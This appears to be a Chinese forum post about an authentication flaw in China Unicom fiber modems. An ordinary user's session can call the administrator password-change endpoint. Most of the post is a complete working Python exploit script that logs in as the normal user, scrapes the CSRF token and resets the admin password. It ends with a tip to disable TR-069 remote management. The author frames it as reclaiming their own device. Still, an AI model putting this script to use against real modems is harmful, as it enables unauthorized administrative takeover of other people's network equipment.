TLDR: 联通的光猫接口鉴权有漏洞,使用普通账号的cookie可以调用管理员密码修改接口
今天运营商远程把我联通光猫的管理员密码改了,在网上找了很多方法都失效,最后找到一个鉴权漏洞,只需要光猫普通用户的用户名密码即可修改管理员密码,代码如下:
import re
import requests
class CU:
def __init__(self, ip, user, pwd):
self.url = f'http://{ip}'
self.user = user
self.pwd = pwd
self.cookies = None
def __enter__(self):
self.login(self.pwd)
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.logout()
def login(self, pwd):
resp = requests.post(
f'{self.url}/login.cgi', data={
'name': self.user,
'pswd': pwd,
},
allow_redirects=False,
)
self.cookies = resp.cookies
def logout(self):
requests.get(f'{self.url}/?out', cookies=self.cookies)
self.cookies = None
def get_csrf_token(self):
resp = requests.get(
f'{self.url}/user.cgi', cookies=self.cookies,
headers={
'Referer': 'http://192.168.1.1/'
})
return re.findall('(?<=csrf_token=)[^\']*', resp.text)[0]
def change_user_pwd(self, new):
requests.post(f'{self.url}/user.cgi?set', data={
'csrf_token': self.get_csrf_token(),
'upswd': self.pwd,
'pswdNew': new,
'pswdConfirm': new,
'act': '',
'tr69_flag': '',
}, cookies=self.cookies)
self.pwd = new
def change_adm_pwd(self, new):
requests.post(f'{self.url}/user.cgi?set_super', data={
'csrf_token': self.get_csrf_token(),
'upswd': self.pwd,
'pswdNewSuper': new,
'pswdConfirmSuper': new,
'act': '',
'tr69_flag': '',
}, cookies=self.cookies)
if __name__ == '__main__':
route_ip = '192.168.1.1'
user = 'user'
pwd = 'pvam3tub'
with CU(route_ip, user, pwd) as obj:
obj.change_adm_pwd('88888888')
PS:如果不想NTR,可以管理员账号登录光猫把上行先例中的TR069给禁用咯,这样运营商就无法远程配置
5分到手